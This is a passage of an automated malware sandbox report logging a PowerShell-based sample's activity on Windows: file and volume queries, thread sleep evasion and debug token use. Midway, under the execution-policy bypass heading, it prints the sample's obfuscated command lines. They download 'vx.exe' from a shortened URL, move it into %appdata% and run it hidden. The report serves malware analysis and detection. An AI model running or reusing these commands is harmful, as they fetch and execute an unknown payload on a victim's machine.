Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4056
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2178
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3939
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2110
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4386
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2252
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep count: 4056 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184Thread sleep count: 2178 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6152Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260Thread sleep count: 3939 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256Thread sleep count: 2110 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6352Thread sleep count: 59 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6376Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 4386 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6308Thread sleep count: 2252 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6372Thread sleep count: 59 > 30
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvice0
Source: powershell.exe, 00000006.00000002.385597645.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmpBinary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000009.00000003.430421096.0000000007E8E000.00000004.00000001.sdmpBinary or memory string: "1.0\Modules\Hyper-VsV
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
